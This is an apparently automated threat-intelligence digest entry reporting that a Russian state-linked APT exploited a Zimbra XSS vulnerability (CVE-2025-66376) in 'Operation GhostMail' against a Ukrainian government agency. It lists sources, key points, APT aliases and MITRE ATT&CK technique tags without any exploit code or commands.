Russian APT Exploits Zimbra XSS to Target Ukrainian Government

Severity: High (Score: 78.0)

Sources: Cybersecuritynews, Scworld, Securityaffairs.Co, Escudodigital

Summary

A Russian state-linked advanced persistent threat (APT) has targeted a Ukrainian government agency through a cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite, identified as CVE-2025-66376. The attack, named 'Operation GhostMail,' involves running scripts via HTML emails to extract credentials and sensitive data without traditional indicators of compromise. The vulnerability was published on January 5, 2026, and was added to the CISA Known Exploited Vulnerabilities catalog on March 18, 2026, indicating active exploitation. This campaign highlights the increasing sophistication of state-sponsored cyber operations aimed at Ukraine amidst ongoing geopolitical tensions. The attack's impact is significant, as it compromises sensitive government communications and data security. Key Points: • Russian APT exploits CVE-2025-66376, a critical XSS vulnerability in Zimbra. • Operation GhostMail targets Ukrainian government agencies via HTML email scripts. • Active exploitation confirmed as of March 18, 2026, by CISA.

Key Entities

• Apt28 (apt_group)
• BlueDelta (apt_group)
• Fancy Bear (apt_group)
• Sofacy Group (apt_group)
• Strontium (apt_group)
• Phishing (attack_type)
• XSS (vulnerability)
• Operation GhostMail (campaign)
• State Hydrology Agency (company)
• Russia (country)
• Ukraine (country)
• CVE-2025-66376 (cve)
• Government (industry)
• T1041 - Exfiltration Over C2 Channel (mitre_attack)
• T1071 - Application Layer Protocol (mitre_attack)
• T1190 - Exploit Public-Facing Application (mitre_attack)
• T1566 - Phishing (mitre_attack)
• Zimbra Collaboration (platform)
• Zimbra Collaboration Suite (platform)
• Zimbra Webmail (platform)